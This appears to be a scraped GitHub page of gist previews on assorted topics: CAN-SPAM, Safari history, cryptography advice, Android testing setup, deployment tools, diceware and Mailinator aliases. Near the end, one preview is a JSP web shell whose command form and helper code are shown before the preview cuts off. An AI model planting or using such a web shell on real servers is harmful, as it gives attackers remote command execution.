James Milazzo JamesMilazzo

@seldo
seldo / can-spam.md
Last active May 2, 2023 19:52
CAN-SPAM

Hi! I notice your email doesn't contain instructions on how to unsubscribe, which is illegal:

https://www.ftc.gov/tips-advice/business-center/guidance/can-spam-act-compliance-guide-business

Despite its name, the CAN-SPAM Act doesn’t apply just to bulk email. It covers all commercial messages, which the law defines as “any electronic mail message the primary purpose of which is the commercial advertisement or promotion of a commercial product or service,” including email that promotes content on commercial websites. The law makes no exception for business-to-business email. That means all email – for example, a message to former customers announcing a new product line – must comply with the law.

Each separate email in violation of the CAN-SPAM Act is subject to penalties of up to $46,517, so non-compliance can be costly. But following the law isn’t complicated. Here’s a rundown of CAN-SPAM’s main requirements:

  1. Don’t use false or misleading header information.
  2. Don’t use deceptive subject lines.
@lindeskar
lindeskar / safari-history.sh
Last active February 16, 2024 11:39
macOS 10.13 Safari browser history with timestamp
sqlite3 "$HOME/Library/Safari/History.db" "select datetime(visit_time + 978307200, 'unixepoch', 'localtime') as date, title from history_visits order by visit_time asc"
@computerality
computerality / gist:3e0bc104cd216bf0f03f8d3aa8fbf081
Last active December 12, 2020 14:30
iOS Security Guide changes for iOS 10 from March 2017
These are additions or notable revisions in the iOS Security Guide
Document Revision History Summary Updated for iOS 10
• System Security
• Data protection classes
• Security Certifications and programs
• HomeKit, ReplayKit, SiriKit
• Apple Watch
• Wi-Fi, VPN
• Single Sign-on
• Apple Pay, Paying with Apple Pay on the web
@GLMeece
GLMeece / latency_numbers.md
Last active May 22, 2024 15:57
Latency Numbers Every Programmer Should Know - MarkDown Fork

Latency Comparison Numbers

Note: "Forked" from Latency Numbers Every Programmer Should Know

| Event | Nanoseconds | Microseconds | Milliseconds | Comparison |
| --- | --- | --- | --- | --- |
| L1 cache reference | 0.5 | - | - | - |
| Branch mispredict | 5.0 | - | - | - |
| L2 cache reference | 7.0 | - | - | 14x L1 cache |
| Mutex lock/unlock | 25.0 | - | - | - |
@atoponce
atoponce / gist:07d8d4c833873be2f68c34f9afc5a78a
Last active June 1, 2024 04:56 — forked from tqbf/gist:be58d2d39690c3b366ad
Cryptographic Best Practices


Putting cryptographic primitives together is a lot like putting a jigsaw puzzle together, where all the pieces are cut exactly the same way, but there is only one correct solution. Thankfully, there are some projects out there that are working hard to make sure developers are getting it right.

The following advice comes from years of research from leading security researchers, developers, and cryptographers. This Gist was [forked from Thomas Ptacek's Gist][1] to be more readable. Additions have been added from

## About

I do Android application assessments often. This is the list of tools and setup I use to perform my testing. It's a reminder for me for when I have to wipe/reload my computer.

### Enable Developer Mode on Test Device

  1. Go to the settings menu, and select "About phone."
  2. Scroll down to "Build number."
  3. Tap it seven (7) times.

### OpenJDK

```
sudo apt-get install openjdk-7-jdk
```

@jaceklaskowski
jaceklaskowski / deployment-tool-ansible-puppet-chef-salt.md
Last active January 3, 2024 22:12
Choosing a deployment tool - ansible vs puppet vs chef vs salt

Requirements

  • no upfront installation/agents on remote/slave machines - ssh should be enough
  • application components should use third-party software, e.g. HDFS, Spark's cluster, deployed separately
  • configuration templating
  • environment requires/asserts, i.e. we need a JVM in a given version before doing deployment
  • deployment process run from Jenkins

Solution

@craSH
craSH / diceware.py
Last active April 28, 2017 17:44
Select easy to use passphrases based on the diceware list; but not their selection methodology [lazy]
#!/usr/bin/env python
"""
Select easy to use passphrases based on the diceware list; but not their selection methodology [lazy].
Place the diceware and beale wordlists (GPG signed is fine) in /usr/share/dict before use.
* Diceware list: http://world.std.com/~reinhold/diceware.wordlist.asc
* Alternative Beale list: http://world.std.com/~reinhold/beale.wordlist.asc
* EFF List (Large): https://www.eff.org/files/2016/07/18/eff_large_wordlist.txt
* EFF List (Small): https://www.eff.org/files/2016/09/08/eff_short_wordlist_1.txt
@ErosLever
ErosLever / cmd.jsp
Created March 18, 2015 09:13
A simple and minimal yet effective JSP Web Shell that escapes command output as HTML entities as needed.
<form method="GET" action="">
<input type="text" name="cmd" />
<input type="submit" value="Exec!" />
</form> <%!
public String esc(String str){
StringBuffer sb = new StringBuffer();
for(char c : str.toCharArray())
if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' )
sb.append( c );
else
@nocturnalgeek
nocturnalgeek / MailinatorAliases
Last active May 28, 2024 06:39
A list of alternate domains that point to @mailinator.com